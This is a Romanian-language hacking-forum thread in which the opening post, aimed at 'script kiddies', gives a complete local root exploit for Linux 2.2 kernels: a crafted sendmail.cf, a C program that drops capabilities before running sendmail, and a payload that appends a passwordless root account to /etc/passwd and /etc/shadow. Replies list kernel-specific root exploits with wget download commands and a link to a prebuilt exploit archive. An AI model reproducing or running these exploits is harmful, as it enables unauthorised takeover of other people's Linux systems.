Jump to content
zbeng

cum sa iei root pe un Linux

Recommended Posts

Incepand din acest numar, m-am gandit sa infiintzez o rubrica pentru "script kiddies", nu de alta, dar sunt un tip foarte lenesh, shi tzin minte ca pe vremuri nu de mult apuse, eram ahtiat dupa programele ushor de folosit, care sa imi ofere root in nu mai mult de 10 minute pe diferite linux-box-uri. Si cum printre cititorii revistei sunt cu sigurantza sunt doritori...

Recent, s-a descoperit ca in kernelele 2.2.x exista o mare problema, si tocmai despre aceasta problema o sa discutam astazi.

"Capabilitatzile" cerute de unul din standardele POSIX au fost recent implementate in kernelul de Linux. Mai exact de pe la 2.2. incoace. Aceste "capabilitatzi" sunt de fapt un nou mod de contol al privilegiilor, care spun de fapt intr-un mod mai specific ce pot sa faca procesele privilegiate (nu vreau sa fiu foarte rautacios cu cititorii revistei, dar shtitzi ce-s alea procese, nu?).

Problema cu aceste capabilitati este ca ele se mostenesc de la procesul tata la procesul fiu asa cum sunt. Si acuma modul de exploatare: Daca setam toti capabilitatile la 0 (adica cel mai neprivilegiat mod cu putiintza), un program cum este sendmail care incearca sa faca un setgid si setuid inainte de a face lucruri care pot dauna sistemului daca sunt rulate ca root, nu va mai reusi sa faca acest lucru, si va rula in continuare ca root. Si daca ai un program care ruleaza ca root, si care face tot ce vrei tu, mai e vreo problema sa controlezi masina resprectiva ? Eu cred ca nu.

Bun. Si cum rubrica se numeste "sKript Kiddo", sa vedem acuma scriptul care face toate povestea sa functioneze cum trebuie. Dar nu va grabiti. Mai intai sa va explic ce vreau sa fac. In primul rand am de gand sa ma joc de-a sendmail-u. Adica sa folosesc sendmailul ca shperaclu in sistem. Si dupa cum stiti, sendmailul are un fisier de configurare, pe care-l chiama sendmail.cf. Ei bine, mie nu imi place acel fisier, asa ca o sa scriu altul. Apoi am de gand sa fac un programel care sa arunce in aer privilegiile lui sendmail, astfel incat sendmail sa nu mai poata sa faca setuid si setgid, iar apoi sendmail.cf-ul scris de mine o sa-i spuna sendmail-ului sa ruleze un program care va scrie in /etc/passwd shi in /etc/shadow o noua linie, care imi va da cont de root.

Deci. Copiati tot ce urmeaza intr-un fisier pe care il veti denumi sendmail.cf. La sfarsitul fisierului, cam a 15-a linie de sus in jos, exista o linie comentata. Urmati indicatiile.

--- Cut Here (sendmail.cf) --

V8/Berkeley

Cwlocalhost

Fw/etc/sendmail.cw

DSlocalhost

CO @ % !

C..

C[[

Kaccess hash -o /etc/mail/access

FR-o /etc/mail/relay-domains

Kdequote dequote

CE root

DnMAILER-DAEMON

CPREDIRECT

DZ8.9.3

O SevenBitInput=False

O EightBitMode=pass8

O AliasWait=10

O AliasFile=/etc/aliases

O MinFreeBlocks=100

O BlankSub=.

O HoldExpensive=False

O DeliveryMode=background

O AutoRebuildAliases=True

O TempFileMode=0600

O HelpFile=/usr/lib/sendmail.hf

O SendMimeErrors=True

O ForwardPath=$z/.forward.$w:$z/.forward

O ConnectionCacheSize=2

O ConnectionCacheTimeout=5m

O UseErrorsTo=False

O LogLevel=9

O CheckAliases=False

O OldStyleHeaders=True

O PrivacyOptions=authwarnings

O QueueDirectory=/tmp

O Timeout.connect=1m

O Timeout.queuereturn=5d

O Timeout.queuewarn=4h

O SuperSafe=True

O StatusFile=/var/log/sendmail.st

O DefaultUser=8:12

O TryNullMXList=true

O RefuseLA=12

O MaxDaemonChildren=20

O ConnectionRateThrottle=1

O HostsFile=/etc/hosts

O SmtpGreetingMessage=$j Sendmail $v/$Z; $b

O UnixFromLine=From $g $d

O OperatorChars=.:%@!^/[]+

O DontProbeInterfaces=true

Pfirst-class=0

Pspecial-delivery=100

Plist=-30

Pbulk=-60

Pjunk=-100

Troot

Tdaemon

Tuucp

H?P?Return-Path: <$g>

HReceived: $?sfrom $s $.$?_($?s$|from $.$_)

$.by $j ($v/$Z)$?r with $r$. id $i$?u

for $u; $|;

$.$b

H?D?Resent-Date: $a

H?D?Date: $a

H?F?Resent-From: $?x$x <$g>$|$g$.

H?F?From: $?x$x <$g>$|$g$.

H?x?Full-Name: $x

H?M?Resent-Message-Id: <$t.$i@$j>

H?M?Message-Id: <$t.$i@$j>

S3

R$@ $@ <@>

R$* $: $1 <@> mark addresses

R$* < $* > $* <@> $: $1 < $2 > $3 unmark <addr>

R@ $* <@> $: @ $1 unmark @host:...

R$* :: $* <@> $: $1 :: $2 unmark node::addr

R:include: $* <@> $: :include: $1 unmark :include:...

R$* [ $* : $* ] <@> $: $1 [ $2 : $3 ] unmark IPv6 addrs

R$* : $* [ $* ] $: $1 : $2 [ $3 ] <@> remark if leading colon

R$* : $* <@> $: $2 strip colon if marked

R$* <@> $: $1 unmark

R$* ; $1 strip trailing semi

R$* < $* ; > $1 < $2 > bogus bracketed semi

R$@ $@ :; <@>

R$* $: < $1 > housekeeping <>

R$+ < $* > < $2 > strip excess on left

R< $* > $+ < $1 > strip excess on right

R<> $@ < @ > MAIL FROM:<> case

R< $+ > $: $1 remove housekeeping <>

R@ $+ , $+ @ $1 : $2 change all "," to ":"

R@ $+ : $+ $@ $>96 < @$1 > : $2 handle <route-addr>

R $+ : $* ; @ $+ $@ $>96 $1 : $2 ; < @ $3 > list syntax

R $+ : $* ; $@ $1 : $2; list syntax

R$+ @ $+ $: $1 < @ $2 > focus on domain

R$+ < $+ @ $+ > $1 $2 < @ $3 > move gaze right

R$+ < @ $+ > $@ $>96 $1 < @ $2 > already canonical

R$* < @ $* : $* > $* $1 < @ $2 $3 > $4 nix colons in addrs

R$- ! $+ $@ $>96 $2 < @ $1 .UUCP > resolve uucp names

R$+ . $- ! $+ $@ $>96 $3 < @ $1 . $2 > domain uucps

R$+ ! $+ $@ $>96 $2 < @ $1 .UUCP > uucp subdomains

R$* % $* $1 @ $2 First make them all @s.

R$* @ $* @ $* $1 % $2 @ $3 Undo all but the last.

R$* @ $* $@ $>96 $1 < @ $2 > Insert < > and finish

R$* $@ $>96 $1

S96

R$* < @ localhost > $* $: $1 < @ $j . > $2 no domain at all

R$* < @ localhost . $m > $* $: $1 < @ $j . > $2 local domain

R$* < @ localhost . UUCP > $* $: $1 < @ $j . > $2 .UUCP domain

R$* < @ [ $+ ] > $* $: $1 < @@ [ $2 ] > $3 mark [a.b.c.d]

R$* < @@ $=w > $* $: $1 < @ $j . > $3 self-literal

R$* < @@ $+ > $* $@ $1 < @ $2 > $3 canon IP addr

R$* < @ $+ . UUCP > $* $: $1 < @ $[ $2 $] . UUCP . > $3

R$* < @ $+ . . UUCP . > $* $@ $1 < @ $2 . > $3

R$* < @ $=w > $* $: $1 < @ $2 . > $3

R$* < @ $j > $* $: $1 < @ $j . > $2

R$* < @ $=M > $* $: $1 < @ $2 . > $3

R$* < @ $* $=P > $* $: $1 < @ $2 $3 . > $4

R$* < @ $* . . > $* $1 < @ $2 . > $3

S4

R$* <@> $@ handle <> and list:;

R$* < @ $+ . > $* $1 < @ $2 > $3

R$* < @ *LOCAL* > $* $1 < @ $j > $2

R$* < $+ > $* $1 $2 $3 defocus

R@ $+ : @ $+ : $+ @ $1 , @ $2 : $3 <route-addr> canonical

R@ $* $@ @ $1 ... and exit

R$+ @ $- . UUCP $2!$1 u@h.UUCP => h!u

R$+ % $=w @ $=w $1 @ $2 u%host@host => u@host

S97

R$* $: $>3 $1

R$* $@ $>0 $1

S0

R$* $: $>Parse0 $1 initial parsing

R<@> $#local $: <@> special case error msgs

R$* $: $>98 $1 handle local hacks

R$* $: $>Parse1 $1 final parsing

SParse0

R<@> $@ <@> special case error msgs

R$* : $* ; <@> $#error $@ 5.1.3 $: "List:; syntax illegal for recipient addresses"

#R@ <@ $* > < @ $1 > catch "@@host" bogosity

R<@ $+> $#error $@ 5.1.3 $: "User address required"

R$* $: <> $1

R<> $* < @ [ $+ ] > $* $1 < @ [ $2 ] > $3

R<> $* <$* : $* > $* $#error $@ 5.1.3 $: "Colon illegal in host name part"

R<> $* $1

R$* < @ . $* > $* $#error $@ 5.1.2 $: "Invalid host name"

R$* < @ $* .. $* > $* $#error $@ 5.1.2 $: "Invalid host name"

R$* < @ > $* $@ $>Parse0 $>3 $1 user@ => user

R< @ $=w . > : $* $@ $>Parse0 $>3 $2 @here:... -> ...

R$- < @ $=w . > $: $(dequote $1 $) < @ $2 . > dequote "foo"@here

R< @ $+ > $#error $@ 5.1.3 $: "User address required"

R$* $=O $* < @ $=w . > $@ $>Parse0 $>3 $1 $2 $3 ...@here -> ...

R$- $: $(dequote $1 $) < @ *LOCAL* > dequote "foo"

R< @ *LOCAL* > $#error $@ 5.1.3 $: "User address required"

R$* $=O $* < @ *LOCAL* >

$@ $>Parse0 $>3 $1 $2 $3 ...@*LOCAL* -> ...

R$* < @ *LOCAL* > $: $1

SParse1

R$* < @ [ $+ ] > $* $: $>98 $1 < @ [ $2 ] > $3 numeric internet spec

R$* < @ [ $+ ] > $* $#esmtp $@ [$2] $: $1 < @ [$2] > $3 still numeric: send

R$+ < @ $=w . > $: < $(virtuser $1 @ $2 $@ $1 $: @ $) > $1 < @ $2 . >

R<@> $+ + $* < @ $* . >

$: < $(virtuser $1 + * @ $3 $@ $1 $: @ $) > $1 + $2 < @ $3 . >

R<@> $+ + $* < @ $* . >

$: < $(virtuser $1 @ $3 $@ $1 $: @ $) > $1 + $2 < @ $3 . >

R<@> $+ < @ $+ . > $: < $(virtuser @ $2 $@ $1 $: @ $) > $1 < @ $2 . >

R<@> $+ $: $1

R< error : $- $+ > $* $#error $@ $(dequote $1 $) $: $2

R< $+ > $+ < @ $+ > $: $>97 $1

R$=L < @ $=w . > $#local $: @ $1 special local names

R$+ < @ $=w . > $#local $: $1 regular local name

R$* < @ $* > $* $: $>95 < $S > $1 < @ $2 > $3 glue on smarthost name

R$* < @$* > $* $#esmtp $@ $2 $: $1 < @ $2 > $3 user@host.domain

R$=L $#local $: @ $1 special local names

R$+ $#local $: $1 regular local names

S5

R$+ + * $#local $@ $&h $: $1

R$+ + $* $#local $@ + $2 $: $1 + *

R$+ $: <> $1

R< > $+ $: < $H > $1 try hub

R< > $+ $: < $R > $1 try relay

R< > $+ $: < > < $1 $&h > nope, restore +detail

R< > < $+ + $* > $* < > < $1 > + $2 $3 find the user part

R< > < $+ > + $* $#local $@ $2 $: @ $1 strip the extra +

R< > < $+ > $@ $1 no +detail

R$+ $: $1 <> $&h add +detail back in

R$+ <> + $* $: $1 + $2 check whether +detail

R$+ <> $* $: $1 else discard

R< local : $* > $* $: $>95 < local : $1 > $2 no host extension

R< error : $* > $* $: $>95 < error : $1 > $2 no host extension

R< $- : $+ > $+ $: $>95 < $1 : $2 > $3 < @ $2 >

R< $+ > $+ $@ $>95 < $1 > $2 < @ $1 >

S95

R< > $* $@ $1 strip off null relay

R< error : $- $+ > $* $#error $@ $(dequote $1 $) $: $2

R< local : $* > $* $>CanonLocal < $1 > $2

R< $- : $+ @ $+ > $*<$*>$* $# $1 $@ $3 $: $2<@$3> use literal user

R< $- : $+ > $* $# $1 $@ $2 $: $3 try qualified mailer

R< $=w > $* $@ $2 delete local host

R< $+ > $* $#relay $@ $1 $: $2 use unqualified mailer

SCanonLocal

R< $* > < @ $+ > : $+ $@ $>97 $3

R< $* > $+ $=O $+ < @ $+ > $@ $>97 $2 $3 $4

R< $* > $* < @ $* . > $: < $1 > $2 < @ $3 >

R< > $* < @ $* > $* $#local $@ $1@$2 $: $1

R< > $+ $#local $@ $1 $: $1

R< $+ @ $+ > $* < @ $* > $: < $1 > $3 < @ $4 >

R< $+ > $* <@ $* > $* $#local $@ $2@$3 $: $1

R< $+ > $* $#local $@ $2 $: $1

S93

R$=E < @ *LOCAL* > $@ $1 < @ $j . > leave exposed

R$=E < @ $=M . > $@ $1 < @ $2 . >

R$=E < @ $=w . > $@ $1 < @ $2 . >

R$* < @ $=M . > $* $: $1 < @ $2 . @ $M > $3 convert masqueraded doms

R$* < @ $=w . > $* $: $1 < @ $2 . @ $M > $3

R$* < @ *LOCAL* > $* $: $1 < @ $j . @ $M > $2

R$* < @ $+ @ > $* $: $1 < @ $2 > $3 $M is null

R$* < @ $+ @ $+ > $* $: $1 < @ $3 . > $4 $M is not null

S94

R$* < @ *LOCAL* > $* $: $1 < @ $j . > $2

S98

R wmail.$- $# wmail $: $1

R wmail.$- < @ $=w . > $# wmail $: $1

R wmail.$- < @ [ $=w ] . > $# wmail $: $1

R wmail.$- < @ [ $+ ] . > $# wmail $: $1

R$* < @ $+ .REDIRECT. > $: $1 < @ $2 . REDIRECT . > < ${opMode} >

R$* < @ $+ .REDIRECT. > $: $1 < @ $2 . REDIRECT. >

R$* < @ $+ .REDIRECT. > < $- > $# error $@ 5.1.1 $: "551 User has moved; please try " <$1@$2>

SLookUpDomain

R<$+> <$+> <$*> $: < $(access $1 $: ? $) > <$1> <$2> <$3>

R<?> <$+.$+> <$+> <$*> $@ $>LookUpDomain <$2> <$3> <$4>

R<?> <$+> <$+> <$*> $@ <$2> <$3>

R<$*> <$+> <$+> <$*> $@ <$1> <$4>

SLookUpAddress

R<$+> <$+> <$*> $: < $(access $1 $: ? $) > <$1> <$2> <$3>

R<?> <$+.$-> <$+> <$*> $@ $>LookUpAddress <$1> <$3> <$4>

R<?> <$+> <$+> <$*> $@ <$2> <$3>

R<$*> <$+> <$+> <$*> $@ <$1> <$4>

SCanonAddr

R$* $: $>Parse0 $>3 $1 make domain canonical

R< @ $+ > : $* @ $* < @ $1 > : $2 % $3 change @ to % in src route

R$* < @ $+ > : $* : $* $3 $1 < @ $2 > : $4 change to % hack.

R$* < @ $+ > : $* $3 $1 < @ $2 >

SParseRecipient

R$* $: <?> $>CanonAddr $1

R<?> $* < @ $* . > <?> $1 < @ $2 > strip trailing dots

R<?> $- < @ $* > $: <?> $(dequote $1 $) < @ $2 > dequote local part

R<?> $* $=O $* < @ $* > $: <NO> $1 $2 $3 < @ $4>

R<?> $* $@ $1

R<NO> $* < @ $* $=R > $: <RELAY> $1 < @ $2 $3 >

R<NO> $* < @ $+ > $: $>LookUpDomain <$2> <NO> <$1 < @ $2 >>

R<$+> <$+> $: <$1> $2

R<RELAY> $* < @ $* > $@ $>ParseRecipient $1

R<$-> $* $@ $2

SLocal_check_relay

Scheck_relay

R$* $: $1 $| $>"Local_check_relay" $1

R$* $| $* $| $#$* $#$3

R$* $| $* $| $* $@ $>"Basic_check_relay" $1 $| $2

SBasic_check_relay

R$* $: < ${deliveryMode} > $1

R< d > $* $@ deferred

R< $* > $* $: $2

R$+ $| $+ $: $>LookUpDomain < $1 > <?> < $2 >

R<?> < $+ > $: $>LookUpAddress < $1 > <?> < $1 >

R<?> < $+ > $: $1

R<OK> < $* > $@ OK

R<RELAY> < $* > $@ RELAY

R<REJECT> $* $#error $@ 5.7.1 $: "550 Access denied"

R<DISCARD> $* $#discard $: discard

R<$+> $* $#error $@ 5.7.1 $: $1

SLocal_check_mail

Scheck_mail

R$* $: $1 $| $>"Local_check_mail" $1

R$* $| $#$* $#$2

R$* $| $* $@ $>"Basic_check_mail" $1

SBasic_check_mail

R$* $: < ${deliveryMode} > $1

R< d > $* $@ deferred

R< $* > $* $: $2

R<> $@ <OK>

R$* $: <?> $>CanonAddr $1

R<?> $* < @ $+ . > <?> $1 < @ $2 > strip trailing dots

R<?> $* < $* $=P > $* $: <OK> $1 < @ $2 $3 > $4

R<?> $* < @ $+ > $* $: <OK> $1 < @ $2 > $3 ... unresolvable OK

R<$+> $* < @localhost > $: < ? $&{client_name} > <$1> $2 < @localhost >

R<$+> $* < @localhost.$m >

$: < ? $&{client_name} > <$1> $2 < @localhost.$m >

R<$+> $* < @localhost.UUCP >

$: < ? $&{client_name} > <$1> $2 < @localhost.UUCP >

R<? $=w> <$+> $* <?> <$2> $3

R<? $+> <$+> $* $#error $@ 5.5.4 $: "553 Real domain name required"

R<?> <$+> $* $: <$1> $2

R<$+> $* < @ $+ > $* $: <USER $(access $2@ $: ? $) > <$1> $2 < @ $3 > $4

R<USER ?> <$+> $* < @ $* > $*

$: <USER $(access $2@$3$4 $: ? $) > <$1> $2 < @ $3 > $4

R<USER ?> <$+> $+ < @ $+ > $*

$: <USER $(access $2@$3 $: ? $) > <$1> $2 < @ $3 > $4

R<USER ?> <$+> $* < @ $+ > $*

$: $>LookUpDomain <$3> <$1> <>

R<?> $* $: <USER $(access $1@ $: ? $) > <?> $1

R<USER $+> <$+> $* $: <$1> $3

R<?> $* $: < ? $&{client_name} > $1

R<?> $* $@ <OK> ...local unqualed ok

R<? $+> $* $#error $@ 5.5.4 $: "553 Domain name required"

...remote is not

R<?> $* $@ <OK>

R<OK> $* $@ <OK>

R<TEMP> $* $#error $@ 4.1.8 $: "451 Sender domain must resolve"

R<PERM> $* $#error $@ 5.1.8 $: "501 Sender domain must exist"

R<RELAY> $* $@ <RELAY>

R<DISCARD> $* $#discard $: discard

R<REJECT> $* $#error $@ 5.7.1 $: "550 Access denied"

R<$+> $* $#error $@ 5.7.1 $: $1 error from access db

SLocal_check_rcpt

Scheck_rcpt

R$* $: $1 $| $>"Local_check_rcpt" $1

R$* $| $#$* $#$2

R$* $| $* $@ $>"Basic_check_rcpt" $1

SBasic_check_rcpt

R$* $: < ${deliveryMode} > $1

R< d > $* $@ deferred

R< $* > $* $: $2

R$* $: $>ParseRecipient $1 strip relayable hosts

R$* $: <?> $1

R<?> $+ < @ $=w > $: <> <USER $1> <FULL $1@$2> <HOST $2> <$1 < @ $2 >>

R<?> $+ < @ $* > $: <> <FULL $1@$2> <HOST $2> <$1 < @ $2 >>

R<?> $+ $: <> <USER $1> <$1>

R<> <USER $+> $* $: <$(access $1 $: $)> $2

R<> <FULL $+> $* $: <$(access $1 $: $)> $2

R<OK> <FULL $+> $* $: <$(access $1 $: $)> $2

R<> <HOST $+> $* $: <$(access $1 $: $)> $2

R<OK> <HOST $+> $* $: <$(access $1 $: $)> $2

R<> <$*> $: $1

R<OK> <$*> $: $1

R<RELAY> <$*> $: $1

R<REJECT> $* $#error $@ 5.2.1 $: "550 Mailbox disabled for this recipient"

R<$+> $* $#error $@ 5.2.1 $: $1 error from access db

R$+ < @ $=w > $@ OK

R$+ < @ $* $=R > $@ OK

R$+ < @ $* > $: $>LookUpDomain <$2> <?> <$1 < @ $2 >>

R<RELAY> $* $@ RELAY

R<$*> <$*> $: $2

R$* $: <?> $1

R<?> $* < @ $+ > $: <REMOTE> $1 < @ $2 >

R<?> $+ $@ OK

R<$+> $* $: $2

R$* $: <?> $&{client_name}

R<?> [$+] $: <BAD> [$1]

R<?> $* $~P $: <?> $[ $1 $2 $]

R<$-> $* $: $2

R$* . $1 strip trailing dots

R$@ $@ OK

R$=w $@ OK

R$* $=R $@ OK

R$* $: $>LookUpDomain <$1> <?> <$1>

R<RELAY> $* $@ RELAY

R<$*> <$*> $: $2

R$* $: $&{client_addr}

R$@ $@ OK originated locally

R0 $@ OK originated locally

R$=R $* $@ OK relayable IP address

R$* $: $>LookUpAddress <$1> <?> <$1>

R<RELAY> $* $@ RELAY relayable IP address

R<$*> <$*> $: $2

R$* $: [ $1 ] put brackets around it...

R$=w $@ OK ... and see if it is local

R$* $#error $@ 5.7.1 $: "550 Relaying denied"

Mprocmail, P=/usr/bin/procmail, F=DFMSPhnu9, S=11/31, R=21/31, T=DNS/RFC822/X-Unix,

A=procmail -Y -m $h $f $u

Msmtp, P=[iPC], F=mDFMuX, S=11/31, R=21, E=rn, L=990,

T=DNS/RFC822/SMTP,

A=IPC $h

Mesmtp, P=[iPC], F=mDFMuXa, S=11/31, R=21, E=rn, L=990,

T=DNS/RFC822/SMTP,

A=IPC $h

Msmtp8, P=[iPC], F=mDFMuX8, S=11/31, R=21, E=rn, L=990,

T=DNS/RFC822/SMTP,

A=IPC $h

Mrelay, P=[iPC], F=mDFMuXa8, S=11/31, R=61, E=rn, L=2040,

T=DNS/RFC822/SMTP,

A=IPC $h

S11

R$+ $: $>51 $1 sender/recipient common

R$* :; <@> $@ list:; special case

R$* $: $>61 $1 qualify unqual'ed names

R$+ $: $>94 $1 do masquerading

S21

R$+ $: $>51 $1 sender/recipient common

R$+ $: $>61 $1 qualify unqual'ed names

S31

R$+ $: $>51 $1 sender/recipient common

R:; <@> $@ list:; special case

R$* <@> $* $@ $1 <@> $2 pass null host through

R< @ $* > $* $@ < @ $1 > $2 pass route-addr through

R$* $: $>61 $1 qualify unqual'ed names

R$+ $: $>93 $1 do masquerading

S51

R< @ $+ > $* $@ < @ $1 > $2 resolve <route-addr>

R$+ < @ $+ .UUCP. > $: < $2 ! > $1 convert to UUCP form

R$+ < @ $* > $* $@ $1 < @ $2 > $3 not UUCP form

R< $&h ! > $- ! $+ $@ $2 < @ $1 .UUCP. >

R< $&h ! > $-.$+ ! $+ $@ $3 < @ $1.$2 >

R< $&h ! > $+ $@ $1 < @ $&h .UUCP. >

R< $+ ! > $+ $: $1 ! $2 < @ $Y > use UUCP_RELAY

R$+ < @ $+ : $+ > $@ $1 < @ $3 > strip mailer: part

R$+ < @ > $: $1 < @ *LOCAL* > if no UUCP_RELAY

S61

R$* < @ $* > $* $@ $1 < @ $2 > $3 already fully qualified

R$+ $@ $1 < @ *LOCAL* > add local qualification

S71

R$+ $: $>61 $1

R$+ $: $>93 $1

#inlocuiti pe linia urmatoare stringul /calea/spre cu directorul curent

#eg: /home/user

Mlocal, P=/calea/spre/add, F=lsDFMAw5:/|@qSPfhn9, S=10/30, R=20/40,

T=DNS/RFC822/X-Unix,

A=add -Y -a $h -d $u

Mprog, P=/usr/sbin/smrsh, F=lsDFMoqeu9, S=10/30, R=20/40, D=$z:/,

T=X-Unix,

A=sh -c $u

Mwmail, P=/usr/local/wMail/wmail,

F=lsD, S=10/30, R=20/40, D=/tmp/,

T=X-Unix,

A=/usr/local/wMail/wmail $u

S10

R<@> $n errors to mailer-daemon

R@ <@ $*> $n temporarily bypass Sun bogosity

R$+ $: $>50 $1 add local domain if needed

R$* $: $>94 $1 do masquerading

S20

R$+ < @ $* > $: $1 strip host part

S30

R<@> $n errors to mailer-daemon

R@ <@ $*> $n temporarily bypass Sun bogosity

R$+ $: $>50 $1 add local domain if needed

R$* $: $>93 $1 do masquerading

S40

R$+ $: $>50 $1 add local domain if needed

S50

R$* < @ $* > $* $@ $1 < @ $2 > $3 already fully qualified

R$+ $@ $1 < @ *LOCAL* > add local qualification

--- Cut here (gata) --

Si in sfarshit scriptul

--- CUT HERE ---

#!/bin/sh

#

# Acest script este adaptat si modificat dupa programele care au

# fost publicate pe lista de discutzii BUGTRAQ.

# Folosirea lui poate produce pagube si este in general impotriva legii

# Personal va recomand sa nu il folositi.

# De asemenea, recomad sa nu il distribuitzi, cu toate ca este sub

# licentza GPL

echo creez fisierele sursa

cat <<gata1> ex.c

#include <linux/capability.h>

int main (void) {

cap_user_header_t header;

cap_user_data_t data;

header = malloc(B);

data = malloc(12);

header->pid = 0;

header->version = _LINUX_CAPABILITY_VERSION;

data->inheritable = data->effective = data->permitted = 0;

capset(header, data);

execlp("/usr/sbin/sendmail", "sendmail" ,"-t", "-C", "./sendmail.cf", NULL);

}

gata1

echo shi acuma cel de-al doilea

cat <<gata.2> add.c

#include <fcntl.h>

int main (void) {

int fd;

char string[250];

seteuid(0);

setegid(0);

setuid(0);

setgid(0);

system("chmod u+w /etc/shadow");

fd = open("/etc/passwd", O_APPEND|O_WRONLY);

strcpy(string, "shmekeru:@:0:0::/root:/bin/shn");

write(fd, string, strlen(string));

close(fd);

fd = open("/etc/shadow", O_APPEND|O_WRONLY);

strcpy(string, "shmekeru::11029:0:99999:7:::n");

write(fd, string, strlen(string));

close(fd);

}

gata.2

echo compilez...

gcc -o add add.c

gcc -o ex ex.c

cat <<gata3> mailexp

From: spargatoru@foobar.com

To: root@localhost

Subject: foo

bar

.

gata3

echo rulez xploitu

./ex < mailexp

echo shi acuma ashteptatzi un pic...

sleep 10

echo root access pentru dumneavoastra

echo daca nu exista ssh instalat in sistem incercati

echo su shmekeru

ssh -lshmekeru localhost

-- Cut here (done) --

Link to comment
Share on other sites

2.4.17

newlocal  - wget [url]www.parit.org/newlocal[/url]

kmod  - wget [url]www.parit.org/kmod[/url]



2.4.18

brk

newlocal

kmod

km.2



2.4.19

brk

newlocal

kmod



2.4.20

ptrace

kmod

brk  



2.4.21

brk

ptrace  

w00t



2.4.22

km.2

brk

ptrace



2.4.23

mremap_pte  

w00t



2.4.24

mremap_pte

w00t

Uselib24

elf



2.4.27

Uselib24

w00t

elf

elflbl



2.6.2

mremap_pte

krad

pwned



2.6.5 to 10



krad

pwned

krad3



www.parit.org o multe de "chestii" interesant :);)

Link to comment
Share on other sites

Tinand cont ca nu mai exist pe aici, n-o sa comentez :D , dar pt 2.2.x si 2.0.x , exista exploituri mult mult mai banale.Din pacate nu mai am sursa , dar am sa las linkul unde l-am pus. http://rapidshare.de/files/38887651/0.tgz.html .Dezarhivezi , si apoi rulezi de cateva ori consecutiv gen : ./0;./0;./0;./0;./0;./0; .Se ia uid 0 pe orice kernel specificat mai sus , si chiar si pe unele 2.4; 2.4.7., 2.4.10 .

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...